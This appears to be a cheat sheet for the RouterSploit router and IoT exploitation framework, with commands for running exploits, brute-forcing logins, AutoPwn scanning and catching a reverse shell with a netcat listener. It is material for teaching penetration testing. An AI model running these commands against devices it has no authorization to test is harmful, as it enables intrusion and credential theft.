RouterSploit
Overview
Section titled “Overview”RouterSploit is an open-source exploitation framework designed for testing embedded devices, routers, and IoT equipment. It provides a modular approach to vulnerability assessment, credential testing, and exploitation of network devices similar to Metasploit but specialized for router and embedded device penetration testing.
Installation
Section titled “Installation”Ubuntu/Debian
Section titled “Ubuntu/Debian”git clone https://github.com/threat9/routersploit.git
cd routersploit
pip install -r requirements.txt
python3 rsf.pybrew install python3
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt
python3 rsf.pyDocker
Section titled “Docker”docker run -it threat9/routersploitFrom Source
Section titled “From Source”git clone https://github.com/threat9/routersploit.git
cd routersploit
python3 setup.py install
python3 rsf.pyStarting the Interactive Console
Section titled “Starting the Interactive Console”python3 rsf.py
# RouterSploit> prompt appearsBasic Commands
Section titled “Basic Commands”| Command | Description |
|---|---|
help | Display all available commands |
show modules | List all available modules |
search [keyword] | Search modules by name or description |
use [module] | Load a specific module |
info | Display module information and options |
set [option] [value] | Configure module options |
back | Exit current module |
show options | Display current module options |
exploit or run | Execute the current module |
exit | Exit RouterSploit |
Module Types
Section titled “Module Types”Exploits
Section titled “Exploits”Modules that execute vulnerabilities to gain unauthorized access or control:
use exploits/d-link/dir_815_rce
use exploits/netgear/cmd_injection
use exploits/tp-link/authentication_bypass
use exploits/cisco/arbitrary_file_uploadCredential Testing
Section titled “Credential Testing”Modules for testing default credentials and brute-forcing:
use creds/telnet_bruteforce
use creds/ssh_bruteforce
use creds/http_bruteforce
use creds/default_credsScanners
Section titled “Scanners”Modules that scan for vulnerabilities without exploitation:
use scanners/autopwn
use scanners/port_scanner
use scanners/service_scanner
use scanners/vulnerability_scannerPayloads
Section titled “Payloads”Modules for generating and delivering payloads:
use payloads/reverse_shell
use payloads/bind_shellSearching and Listing Modules
Section titled “Searching and Listing Modules”Search by Keyword
Section titled “Search by Keyword”search d-link
search rce
search authentication
search remote_code_executionList All Modules
Section titled “List All Modules”show modules
show modules | grep exploit
show modules | grep creds
show modules | grep scannerGet Module Details
Section titled “Get Module Details”use exploits/netgear/cmd_injection
info
# Shows: description, options, required fields, vendor infoWorking with Exploits
Section titled “Working with Exploits”Basic Exploit Workflow
Section titled “Basic Exploit Workflow”# 1. Search for relevant exploit
search netgear
# 2. Load the module
use exploits/netgear/cmd_injection
# 3. View options
show options
# LHOST (attacker IP), LPORT (listener port), TARGET (target IP)
# 4. Set required options
set target 192.168.1.1
set lhost 192.168.1.100
set lport 4444
# 5. Execute exploit
exploit
# or
runSetting Target Information
Section titled “Setting Target Information”set target 192.168.1.1
set target http://192.168.1.1:8080
set rhost 192.168.1.1 # Remote hostSetting Payload Options
Section titled “Setting Payload Options”set lhost 192.168.1.100 # Listener/attacker host
set lport 4444 # Listener port
set lpass password123 # Listener password
set payload reverse_shellViewing Exploit Requirements
Section titled “Viewing Exploit Requirements”info
# Shows which options are required vs optional
show optionsCredential Testing
Section titled “Credential Testing”Default Credential Testing
Section titled “Default Credential Testing”use creds/default_creds
set target 192.168.1.1
set vendor netgear
exploitBrute-Force Attack
Section titled “Brute-Force Attack”use creds/telnet_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/passwords.txt
exploitHTTP Credential Brute-Force
Section titled “HTTP Credential Brute-Force”use creds/http_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/wordlist.txt
set threads 4
exploitSSH Brute-Force
Section titled “SSH Brute-Force”use creds/ssh_bruteforce
set target 192.168.1.1
set port 22
set username root
set wordlist /path/to/passwords.txt
exploitScanner Modules
Section titled “Scanner Modules”AutoPwn Scanner
Section titled “AutoPwn Scanner”Automatically scans for vulnerabilities and attempts exploitation:
use scanners/autopwn
set target 192.168.1.1
exploit
# Scans for known vulnerabilities and exploitation pathsPort Scanner
Section titled “Port Scanner”Identifies open ports on target:
use scanners/port_scanner
set target 192.168.1.1
set ports 1-1000
exploitService Detection
Section titled “Service Detection”Identifies services and versions:
use scanners/service_scanner
set target 192.168.1.1
exploitVulnerability Scanner
Section titled “Vulnerability Scanner”Scans for known vulnerabilities:
use scanners/vulnerability_scanner
set target 192.168.1.1
set vendor netgear
exploitSupported Vendors
Section titled “Supported Vendors”RouterSploit includes modules for major router and embedded device manufacturers:
| Vendor | Common Vulnerabilities |
|---|---|
| D-Link | Directory traversal, RCE, auth bypass |
| Netgear | Command injection, authenticated RCE |
| TP-Link | Authentication bypass, RCE |
| Cisco | File upload, auth bypass, buffer overflow |
| Huawei | Authentication bypass, RCE |
| Ubiquiti | Authentication bypass, RCE |
| Linksys | Command injection, firmware upload |
| Belkin | Default credentials, auth bypass |
| ASUS | Arbitrary file upload, RCE |
| Mikrotik | Authentication bypass, RCE |
Common Workflows
Section titled “Common Workflows”Reconnaissance and Exploitation
Section titled “Reconnaissance and Exploitation”# Step 1: Scan target network
use scanners/port_scanner
set target 192.168.1.1
exploit
# Step 2: Identify device and run AutoPwn
use scanners/autopwn
set target 192.168.1.1
exploit
# Step 3: Attempt default credentials
use creds/default_creds
set target 192.168.1.1
exploitTargeted Exploitation
Section titled “Targeted Exploitation”# Know target device? Search directly
search "TP-Link WR841N"
# Load specific exploit
use exploits/tp-link/wr841n_rce
# Set options
set target 192.168.1.1
set lhost 192.168.1.100
# Execute
exploitCredential Harvesting
Section titled “Credential Harvesting”# Multiple credential testing approaches
use creds/default_creds
set target 192.168.1.1
exploit
# Then brute-force remaining services
use creds/telnet_bruteforce
set target 192.168.1.1
exploitPost-Exploitation Shell Access
Section titled “Post-Exploitation Shell Access”# After successful exploit, obtain shell
# Set up listener (in separate terminal)
nc -lvnp 4444
# In RouterSploit, execute reverse shell payload
set payload reverse_shell
set lhost 192.168.1.100
set lport 4444
exploit
# Shell connects to listenerCustom Module Creation
Section titled “Custom Module Creation”Module Structure
Section titled “Module Structure”Create custom exploit at routersploit/modules/exploits/custom/:
from routersploit.modules import *
class Exploit(BaseExploit):
"""Custom Router Exploitation Module"""
info = {
'name': 'Custom Router RCE',
'description': 'Custom exploitation module description',
'vendor': 'Custom Vendor',
'model': 'Custom Model',
'version': '1.0',
}
target = Param.ip_addr('Target IP')
port = Param.port(80, 'Target port')
def check(self):
"""Check if target is vulnerable"""
# Vulnerability check logic
pass
def exploit(self):
"""Execute exploit"""
# Exploitation logic
passRouterSploit vs Metasploit
Section titled “RouterSploit vs Metasploit”| Feature | RouterSploit | Metasploit |
|---|---|---|
| Focus | Routers/IoT | General penetration testing |
| Learning Curve | Lower | Higher |
| Module Availability | Router-specific | Extensive (all targets) |
| Ease of Use | Simpler | More complex |
| Customization | Good | Excellent |
| Community | Smaller | Large |
| Target Scope | Embedded/Router | Broad |
| Price | Free | Free community version |
Advanced Options
Section titled “Advanced Options”Setting Threads for Brute-Force
Section titled “Setting Threads for Brute-Force”use creds/http_bruteforce
set threads 10
# Increases concurrent attemptsCustom Wordlists
Section titled “Custom Wordlists”set wordlist /path/to/custom/passwords.txt
set username_wordlist /path/to/usernames.txtTimeout Configuration
Section titled “Timeout Configuration”set timeout 10
# Increases response wait time for slow networksLogging Output
Section titled “Logging Output”exploit > output.log
# Capture results to fileTroubleshooting
Section titled “Troubleshooting”| Issue | Solution |
|---|---|
| Module not found | Use search to find correct module name |
| Connection refused | Verify target IP and port accessibility |
| Exploit fails silently | Run info to verify all required options set |
| Slow brute-force | Increase threads parameter |
| Python import errors | Reinstall dependencies: pip install -r requirements.txt |
Security Considerations
Section titled “Security Considerations”- Always obtain written permission before testing
- Use on devices you own or have explicit authorization to test
- RouterSploit should only be used for authorized security assessments
- Document all findings and exploitation attempts
- Disable unnecessary services on production routers
- Regularly update firmware on network devices
- Change default credentials immediately after device setup
Resources
Section titled “Resources”- Official GitHub: https://github.com/threat9/routersploit
- Module documentation in repository
- Vulnerability research databases (CVE, NVD)
- Vendor security advisories
- IoT security blogs and research papers